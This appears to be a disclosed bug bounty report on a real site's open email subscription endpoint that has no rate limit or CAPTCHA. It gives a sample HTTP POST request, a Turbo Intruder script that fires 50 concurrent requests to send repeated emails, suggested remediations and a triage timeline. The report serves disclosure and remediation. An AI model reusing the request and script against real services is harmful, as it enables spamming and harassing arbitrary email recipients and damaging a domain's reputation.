SANTIKO KUSNUL HAKIM

Published On: 01 Aug 2025

$200

[Improper Access Control] - Open Email Subscription Endpoint Allows Unauthenticated Email Spam

Rate Limits
Private | Web
---
LOW VALID

An open subscription endpoint on travelfrom.fr allows unauthenticated users to submit any arbitrary email address to trigger email delivery from the site’s domain. This behavior can be exploited to send unsolicited emails (spam) to victims without requiring any verification or account association.

Description

This vulnerability could be abused to: 1. Spam users with unwanted emails 2. Damage the brand’s email reputation (domain may be flagged as spam) 3. Lead to user harassment 4. Exhaust backend resources or email service quotas 6. Enable potential phishing-style social engineering campaigns

Impact

1. Unauthenticated attackers can send repeated emails to arbitrary addresses. 2. Enables mass abuse via scripting. 3. Allows misuse of third-party email addresses. 4. Domain Reputation




Reproduction Steps

Step
1

Request like below:

POST /en/api/common/subscribe HTTP/2
Host: travelfrom.fr
Content-Type: application/json
X-Csrf-Token: V66RsUtfHLCSbSBSYfvEdl3ZWolXfP0r
X-Api-Version: v1
Referer: https://travelfrom.fr/en

{
  "email": "[email protected]",
  "service": "avia"
}

Note: The above email ([email protected]) is not registered on the platform, yet the system accepts the request and appears to send an email.

Check the email account.

Step
2

Now try to use BurpSuite's Turbo Intruder with script like below:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=10,
                           requestsPerConnection=10,
                           pipeline=True
                           )

    for i in range(50):
        engine.queue(target.req)

def handleResponse(req, interesting):
    table.add(req)

Step
3

the succedeed email sent is 15, but eventhough it should be RESTRICTED using CAPTCHA or another like X-RateLimit: 3 and/or related with it

Remediations

Implement Double Opt-In: Require users to confirm their subscription by clicking a link sent to their email before any content is delivered. Add CAPTCHA: Include a CAPTCHA in the form to prevent automation. Rate Limiting: Limit the number of requests per IP and per email address. Email Validation: Consider checking if the email belongs to a registered user, or throttle emails to unregistered addresses. Log Abuse Attempts: Record abnormal behavior patterns for monitoring or blocking.

Timeline
.
SANTIKO 04 May 2025

@paktiko @paktiko (author) changed status to [New]

.
Private 05 May 2025

@HP-Triage0x007 @HP-Triage0x007 (triage_team) changed status to [In review]

.
Private 14 May 2025

@HP-Triage0x007 @HP-Triage0x007 (triage_team) changed Severity from 6.9 to 3.9

.
Private 14 May 2025

@HP-Triage0x007 @HP-Triage0x007 (triage_team) changed status to [Triaged]

.
Private 14 May 2025

@paktiko @paktiko (author) earned 100.0 $

.
Private 14 May 2025

@HP-Triage0x007 @HP-Triage0x007 (triage_team) changed status to [Paid]

.
SANTIKO 14 May 2025

@paktiko @paktiko (author) earned 100.0 $ (bonus)

.
SANTIKO 14 May 2025

@paktiko @paktiko (author) received 2 points of reputation

VALID






Show All Images